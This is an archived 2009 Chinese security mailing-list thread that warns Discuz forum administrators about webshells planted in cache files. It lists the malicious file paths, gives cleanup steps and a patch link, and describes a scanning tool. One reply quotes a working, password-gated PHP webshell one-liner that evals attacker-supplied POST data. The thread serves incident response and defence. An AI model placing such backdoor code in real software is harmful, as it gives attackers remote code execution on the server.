这个星期整整在外面转悠了一个星期,哈哈,一联网就发现这么多的牛牛相继出现开始 分析了。
发件人: [email protected] [mailto:[email protected]] 代表 flyh4t 发送时间: 2009年8月20日 18:02 收件人: ph4nt0m 主题: [Ph4nt0m] Re: 请立即检查自己的站点中是否存在可供挂马的 Webshell [扫描 程序已更新] <?php (substr(md5($_POST['b']),28)=='7aaa') && eval($_POST['a']);?> 这个? 在2009-08-20 09:04:10,LIN <[email protected]> 写道: >近日网上看到越来越多的站长报告说自己的论坛被人放了 Webshell 甚至挂马, 起初 没在意, 但令我诧异的是, 今天我在本机的dz的根目录也 >发现了一个Webshell, 接着检查了一下, 发现乃至 discuz.net 也中招了! > >由此可见, 这个可能存在的漏洞造成的危害是极其严重的, 通过利用在服务器中生成 的 Webshell, 黑客可以用它来挂马、修改数据乃至清空整个 >论坛数据! 请每个看到这个帖子的站长立即检查论坛下面有没有以下文件, 如果有, 请立即删除! > >./usergroup_0.php >./forumdata/cache/usergroup_0.php > >除此之外, 如果发现论坛有字体变大等现象, 请进入后台 风格管理 的高级模式, 检 查有没有异常的 自定义模板变量, 有则删除之并更新论坛缓 >存! > >如果发现了上述恶意文件, 请删除后检查论坛模板, 查看是否被人挂马等. 删除文件 后, 请密切关注这些异常文件是否会再次出现. > >官方已在下载服务器上发布补丁, 请点击这里下载安装. >http://www.discuz.net/attachment.php?aid=514705&k=f26db2de701160164c6346bb3 222ec70&t=1250726633&sid=9a6e52k93HNHVR5vY9OyipJBmOi%2FxwjLS8DRILBvCQGTqtE >========================================= > >下面发布一个我写的扫描程序, 它可以扫描出论坛中 usergroup_*.php、style_*.php 等缓存文件是否有 >Webshell, 附件目录是否存在 php/asp 文件, 模板中是否有外链存在 (有外链则表示 有可能被挂马), 以及 stylevars >表中的非法数据. > >如果比较懒的朋友可以用这个程序对论坛进行一次扫描. 使用方法很简单, 下载后解 压缩并将 scansw.php 上传至论坛根目录, 打开后选择需 >要扫描的项目并点击开始扫描即可. > > >这个程序不会改动任何论坛数据, 只对目前存在的问题做出建议, 不会对论坛产生任 何影响. >扫描结果可能存在误差, 请进行任何改动前都要备份文件! >使用完毕后请删除此程序文件, 最好再在这里回个帖子帮顶一下. > >提示: >如果扫描程序提示需要到后台执行一段sql代码的话, 请一定要根据提示操作! 如果有 这个提示出现, 我相信您的站点必定出现过字体变大的奇怪现 >象! 只是当初很多人没有意识到这个问题的严重性! 执行sql后请更新论坛的缓存, 如 果您关闭了该风格, 可以再次开启它. > >使用 PHP4 的站长请重新下载程序. > >更新: >1. 增加扫描附件目录中是否有 php/asp 文件 >2. 增加安全外链忽略功能 (可编辑 $safeurls 增加) >3. 扫描结束后如果没有发现任何危险代码做出安全显示 >4. 由于 PHP4 不支持 DOM, PHP5 以下版本自动关闭扫描模板功能 > >程序使用的是DOM来扫描htm文件, 检测<script>标签和<iframe>标签, 包括检测 <script></script> 之间的内 >容是否有外链, 所以, 这程序除了检测这次的Webshell之外, 平时下载插件或者风格 后在安装之前也可以扫一下下载的东西安不安全. > >> _____ <http://www.yeah.net/?from=footer> 没有广告的终身免费邮箱,www.yeah.net </span --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
